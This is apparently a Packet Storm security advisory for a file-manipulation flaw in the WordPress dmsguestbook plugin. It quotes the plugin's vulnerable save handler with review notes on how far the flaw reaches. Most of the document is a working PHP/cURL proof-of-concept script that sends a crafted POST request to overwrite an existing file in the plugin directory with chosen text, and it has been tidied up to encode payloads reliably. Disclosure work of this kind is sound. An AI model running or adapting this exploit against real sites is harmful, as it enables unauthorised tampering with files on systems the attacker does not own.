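http://packetstormsecurity.com/user/evex/
Author: Evex
Title: WordPress dmsguestbook Plugin File Manipulation
Description: The WordPress dmsguestbook plugin is vulnerable to a file manipulation issue. It lets an unauthenticated attacker overwrite the contents of files that already exist under the plugin directory (the advisory describes the reachable set as "existing text files only"; see the note on the file-name check below).
<?php
/*
Vulnerable code (the plugin's handler for action=save_advanced_data; $POSTVARIABLE
appears to be the plugin's alias for the POST array -- confirm against the plugin source):

if ($POSTVARIABLE['action'] == 'save_advanced_data') {
    $abspath = str_replace("\\", "/", ABSPATH);
    // check the folder variable
    if ($POSTVARIABLE['folder'] == "language/") {
        $folder = "language/";
    } else {
        $folder = "";
    }
    // check the file variable xxxx.txt
    if (preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file']) == 1) {
        $file = $POSTVARIABLE['file'];
    } else {
        $file = "";
    }
    clearstatcache();
    if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" . $folder . $file)) {
        $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" . $folder . $file, "w");
        $writetofile = str_replace("\\", "", $POSTVARIABLE['advanced_data']);
        fwrite($handle, $writetofile);
        fclose($handle);
        message("<b>" . __("saved", "dmsguestbook") . "...</b>", 300, 800);
    } else {
        message("<br /><b>" . __("File not found!", "dmsguestbook") . "</b>", 300, 800);
    }
}

Review notes on the vulnerable code:
 - The folder check is a strict whitelist ("language/" or nothing) and the file
   regex allows only [a-z0-9] before ".txt", so no path separators or ".."
   reach the path: writes stay inside wp-content/plugins/dmsguestbook/ (and its
   language/ subfolder). This is not a traversal bug.
 - The regex is anchored only at the start. Any existing file whose name begins
   with an alphanumeric run followed by ".txt" passes (for example "a.txt.php",
   if such a file existed), so "text files only" is slightly imprecise; the
   real limit is file_exists(): only pre-existing files can be targeted, and
   fopen(..., "w") truncates them before the attacker-controlled write.
 - Every backslash is stripped from advanced_data before it is written.
 - No nonce or capability check is visible in this snippet. Whether the handler
   is reachable without a WordPress login depends on how the plugin registers
   it, which is outside this excerpt.
*/

// ---------------------------------------------------------------------------
// PoC: overwrite an existing file in the plugin directory with $TEXTTOINJECT.
// ---------------------------------------------------------------------------

$TEXTTOINJECT = 'INPUT TEXT HERE';
$TXTFILE = 'readme.txt'; # localhost/wp-content/plugins/dmsguestbook/readme.txt
$url = "http://localhost/x/wordpress";

// Build the body with http_build_query so that '&', '=', '+', '%' and spaces
// inside the injected text survive transport. The original concatenated the
// raw values into the body, which silently corrupted the request (or split
// the payload into extra parameters) for any text containing those characters.
$postFields = http_build_query([
    'action'        => 'save_advanced_data',
    'file'          => $TXTFILE,
    'advanced_data' => $TEXTTOINJECT,
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/admin.php?page=dmsguestbook');

// NOTE(review): no cookie or credentials are sent. The advisory claims the
// handler runs for unauthenticated requests; if the target redirects to
// wp-login.php instead, the plugin version under test is not exposed this way.
$response = curl_exec($ch);
if ($response === false) {
    // The original ignored transport failures and always printed "Payload Sent".
    fwrite(STDERR, "Request failed: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// The original always printed readme.txt here even when $TXTFILE was changed;
// report the file that was actually targeted.
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/$TXTFILE";
echo "\nHTTP status: $status\n";
?>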